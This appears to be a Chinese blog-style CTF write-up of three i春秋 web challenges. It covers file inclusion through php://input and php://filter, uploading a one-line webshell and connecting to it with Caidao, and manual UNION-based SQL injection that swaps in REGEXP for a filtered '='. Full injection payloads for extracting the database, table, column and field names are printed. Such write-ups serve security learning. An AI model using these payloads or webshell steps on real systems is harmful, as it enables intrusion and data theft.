i春秋 web(2)
2021-04-18 19:26
标签:打开 菜刀 lte 就会 显示 regex rip put cat 首先是一段代码 提示说是文件包含查找一下allow_url_include,是打开的,那我们就可以用php://input 我先用先用system执行ls命令查看下目录 然后用php://filter来读取文件 就会有一串base64 解码得到flag 首先看的是上传文件的界面,说是可以上传任意文件,那就先上传一句话咯,在我上传之后,点击上传成功就能查看上传的文件, 发现我的一句话的 上传之后点击上传成功查看没有内容,应该是被解析了,所以用菜刀连接 对于这个题提示说是注入,我们就尝试注入,我比较笨,试了好多都没有试出来,百度了大佬的wp才发现,他是过滤了select、和=, 而且,一般绕过方式不行,得用绕过,长知识啊,然后就开始手工union注入,因为=也被过滤了,所以用REGEXP代替 首先查看显示位 然后获取数据库:?id=1 union select 1,(select(database()) ),3 然后获取表,?id=1 union select 1,(select(group_concat(table_name))from information_schema.tables where table_schema REGEXP ‘sqli‘),3 然后获取字段名:?id=1 union select 1,(select(group_concat(column_name))from information_schema.columns where table_name REGEXP ‘info‘),3 然后获取字段内容:?id=1 union select 1,(select(group_concat(flAg_T5ZNdrm))from info ),3 i春秋 web(2) 标签:打开 菜刀 lte 就会 显示 regex rip put cat 原文地址:https://www.cnblogs.com/qie-date/p/12274988.htmlinclude
upload
SQL
include
upload
SQL